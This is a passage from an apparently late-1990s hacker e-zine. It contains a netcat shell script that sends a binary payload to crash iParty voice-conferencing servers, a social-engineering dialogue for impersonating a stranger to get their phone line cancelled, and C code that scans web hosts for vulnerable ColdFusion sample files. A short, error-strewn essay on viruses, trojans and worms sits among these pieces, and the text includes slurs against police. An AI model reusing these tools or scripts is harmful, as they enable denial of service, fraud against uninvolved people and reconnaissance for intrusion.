int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
/* -EOF- */
------------------------------
1.06 --=\\ippooper\\=--
#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.
if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"Ìap/HÔD0iAá1/2L%ÏÌEBEÔð'*}ÒyÓÔ¥(3êznÃuèÔj+¨°(Ö-Öd'(tm)øZiXåËy7
¡'``à3/41/2Ï Cµ¶ïüÖʹçî³ÏÞçì1/2Ï>çÜE¢6â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§
8ÂÓ'L5"ï鲱ᤸDRGÒIôlqYg»ÒiÆiÕ3/4ëH¹Hwòá1/2²»Ô3ðl*oÎ#ésC9m,
_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi
------------------------------
--=\\2.00\\=--
2.01 --=\\Understanding a computer virus\\=--
INTRODUCTION
"Information wants to be free!"
In the last few years, much has been said and text files wrote about computer
viruses. Many rumors, but few straight facts, have led people to be aware of
possible problems but have not shown an effective way to deal with them. Today most
computer users know of computer viruses, but few know how, or bother to take even
the most basic precautions against them. The majority of all virus infections, and
the subsequent destroyed data, could be pretend by a few easy steps. Unfortunately,
people with the right kind of insight have long considered it a good policy not to
share their knowledge with outsiders. In fear that some people would misuse this
information to create more malicious viruses, it has generally been frowned upon to
write a text in this area. Obviously this "protection by ignorance" has done no
good. Its failure can be seen in the thousands of viruses already in existence, and
the new ones constantly appearing. Virus programmers have had no problems obtaining
this information they need to program viruses, but other computer users seek
information on how to protect themselves have been left in the dark. How can anybody
protect them selves from what they do not understand? The idea of dangerous,
forbidden knowledge has always been particular distasteful to me. Trying to keep
information from people, besides being impossible, has never led to any good.
Information needs to be free!
Definition
"Don't buy a computer"
Before going any further in the virus discussion, we need to get a few things clear.
What exactly is a computer virus? How dose a computer virus differentiate itself
from other damaging programs and from other "normal" programs? There has been some
confusion on what viruses actually are and what they are not. Often the designation
"computer virus" is used simply to denote any destructive program. This, strictly
speaking, is not correct. In this text I will try to reach a clear definition of
"computer virus" and other computer mischief programs. There are basically three
different kinds of these programs: viruses, Trojan horses, and worms. Generally, it
can be said that these programs gain access to places and/or perform actions not
intended by the user, often damaging data in the process. However, the exact phrases
often get misused and mixed. That is not surprising, considering the difficulty even
experienced computer users can have in obtaining the "hard" technical information
needed to understand the concepts involved. Furthermore, methods that can
successfully defend you against one type may have no effect against another. It is
important to know what these "rouge" programs do, if you are to defend yourself
against them.
Virus
The first computer virus for a personal computer was discovered (and created) around
1980.That means we've had about 15 years to get acquainted with them and used to
their presence. Computer viruses are not short-lived curiosity; that, are today and
will continue to be here for as long as anyone can foresee. They are sufficiently
widespread to be a real danger to most computers, requiring people using computers
to have at least a basic knowledge of their workings if they want to avoid
infections. And even though the term "computer virus" is well known even among
people with little computer experience, what a computer virus actually signifies
remains a mystery to most people. At least this is no mystery, since there is
disagreement on what a computer virus is, and what it's not, even among people
specialized in the computer virus fields. There is no general, agreed-upon
definition. Still, let's look at some of the basic requirements that must be true
before a program can be called a virus.
First, like a biological virus, a computer virus exists to replicate; infinite
cannot replicate, it's not a virus. A biological virus replicates to spread, its
DNA. A computer virus can replicate to spread its program code, just as a biological
virus changes inn the cells' own DNA to force them to make new viruses, a computer
virus modifies the code in the programs it targets to make new computer viruses.
The term, "computer virus" was coined by Fred Cohen in the first paper discussing
the theoretical aspects of computer virus programs. His thesis was published as
early as 1984, in the days when a virus was still an interesting novelty. However,
perhaps because it appeared before many viruses that propagate by attaching
themselves directly to other programs. This is a bit narrow for today's use and does
not contain many of the programs that today we call viruses, namely those that
propagate by attaching themselves to floppy/hard disks instead of specific programs
(partition/boot infectors). If we just broaden Cohen's definition to include those
disk-infecting viruses, we can cover all the different virus types in existence
today and still have a small group with common characteristics.
1. A virus is self-replicating program whose main (only) purpose is to propagate
itself to as many different places as possible.
2. A virus propagates itself by modifying another program to include itself.
3. (This is the crutch) A virus can only propagate itself by an (unknowing) act of a
user of the system in which it exists.
A small note on the plural "virus" is Latin, meaning poison. In Latin it is a "mass"
word, like water and air in English, and as such has no Latin plural. Its correct
English plural is viruses, though often others are seen, like viri and virii.
Trojan Horse
Trojan horses are simply programs that feign, by their name or their documentation,
to do one thing, when in fact they do something else entirely, something often
very destructive. Trojan horses are not very common and (contrary to viruses) are
found mostly on "Computer Bulletin Boards". Trojans' spreading potential is not very
big, because once they are run they give them selves away (cease to be Trojans),
and the only way for a trojan to propagate itself would be for a user to copy it to
somewhere else. Besides the author, few people would knowingly spread them (or any
other destructive program, for that madder). A typical trojan horse could simply be
a program given the name of another known program, which would be tempting for an
unsuspecting user to start. A number of Trojans pretending to be anti- virus or
anti-Trojan software have been circulated. The name "Trojan horse" came from the
wooden horse the ancient Greek army used to conquer the city of Troy and save the
beautiful Helen.
Worm
A worm can be defined as a program propagating itself in a network of computers,
using bugs, which are unforeseen (by the designers and users) side effects of the
operating system, or breaking (guessing) passwords to gain access to other machines
in the network. Contrary to viruses, no user interactions are needed for the worm to
spread. Worms need no host program to propagate; viruses are parasitic, worms are
not. Periodically, rumors surface of worms existing in a DOS environment, using
modem to propagate them selves. However, that is just a rumor. No worm has ever
spread using a modem as a channel. Even though it is possible to make a worm for a
DOS system spreading itself in a network of PCs, few have been spotted, mainly
because of the limited size of such networks. Today there are only a few computer
networks with sufficient size to enable a worm to be anything but a local menace:
the internet. There have been two major outbreaks of worms on the internet, the
not-so-famous Christmas Exec mail worm of 1987 and the very famous (infamous) Morris
internet worm of 1988.
Written by, EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
2.02 --=\\Dropping Phonelines\\=--
This is one of the best thangs i ever figerd out and it is easy as 1,2,3 I wrote
this for educational use only!! If you fuck up and get busted it is not my ass it
is yours. here we go you phone addicts:
-Step 1.
Go to a COCOT (Customer Owned Coin Operated Telephone.). Now dial up a pbx
(Private Branch Exchange) all you got to do now is dial up the phone company.
-Step 2.
call the operator and tell him/her you would like to cancel your account with the
service.
here is how it will probley go:
--
(operator) (phone companyname and his/her name) how may I help you?
(you) I would like to cancle my acount with your service.
(oparator) What is your name sir/madom and your area code-prefix-number?
(you) Blah blah (the lamers name that is listed in the phone book)
(oparator) Mr.blah/Ms.blah we need your acount and access number to go any
farther.
(you) What is what?
(oparator) It is the digits on top of your last phone bill.
(you) See that is why I want to cancle my account reason being I all
ever get the bill or any thang of that type and at&t/sprint/mci has a
lot better deal then you guys have.
(oparator) Sorry Mr.blah/Ms.blah I can't cancle your phone line with out the
account and access number.
(you) Well it is not my falt that I don't ever get the bill from your
company and it is your falt.
(oparator) I am sorry you feel this way here is what you can do come in to our
office on(blah)
(you) Look I am not like other pepole I can't get out of the house I got
this disorder and I can't have any one to go there just cancle the
number please this will save us both time.
(oparator) Please hold Mr.blah/Ms.blah
(you) ok
(oparator) Your phone number has now be cancled thank you for using our service.
(you) Yea ok bye
--
-Step 3.
Hang the phone up and get the fuck out of the area. If on feet and you see the
pigs don't fucking freak out. Same if you are driveing.All pigs are gay and dumb
soo chill.
EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
2.03 --=\\Cold Fusion Scanner\\=--
/* Usage:
$ gcc -o cfscan cfscan.c -w (hey i don't want my warnings shown :P)
$ ./cfscan www.antionline.com > tinylog.txt
$ echo PBBSER 0wns me
Greets:
Groups: Phukt Security, The LegionOOT, Team Spl0it, & gH
Channels (various servers): #hacktech, #hyperlink, #3xposure, #c,
#./hack, #ek & #phukt
People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X,
NeonMatrix, Azmodan, v0rt-fu, Tainted Angel, cpu, tw1ster,
ultr4k- the intellimouse hax0r, ... the list goes on
and on...
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in host;
struct hostent *he;
int port = 80;
char *gets[4];
char getbuff[1000];
char *check;
gets[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
gets[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
gets[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
system("clear");
printf("\t\tCold Fusion Vulnerability Scanner\n");
printf("\t\tBy PBBSER -- Phukt Security Coming At You\n");
if (argc != 2)
{
printf("\nUsage: %s [host]\n", argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
perror("getting hostname");
exit(0);
}
sockfd=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&host.sin_addr, he->h_length);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
}
printf("connected\n");
send(sockfd, gets[1],strlen(gets[1]),0);
recv(sockfd, getbuff, sizeof(getbuff),0);
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("openfile.cfm found\n");
}
else
{
printf("openfile.cfm wasn't found, so we are gunna exit\n");
close(sockfd);
exit(0);
}
close(sockfd);
sockfd=socket(AF_INET, SOCK_STREAM, 0);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
}
send(sockfd, gets[2],strlen(gets[2]),0);
recv(sockfd, getbuff, sizeof(getbuff),0);
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("exprcalc.cfm found\n");
}
close(sockfd);
sockfd=socket(AF_INET, SOCK_STREAM, 0);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
}
send(sockfd, gets[3],strlen(gets[3]),0);
recv(sockfd, getbuff, sizeof(getbuff),0);
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("displayopenedfile.cfm found\n");
}
close(sockfd);
printf("\nWe're done. Word.\n");
}
PBBSER
pbbser@legionoot.hypermart.net
------------------------------
Please visit:
http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242
to help us pay the bills. Please take to seconds out of your time and go there.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art is done by Lord Oak and permission is needed from him before using.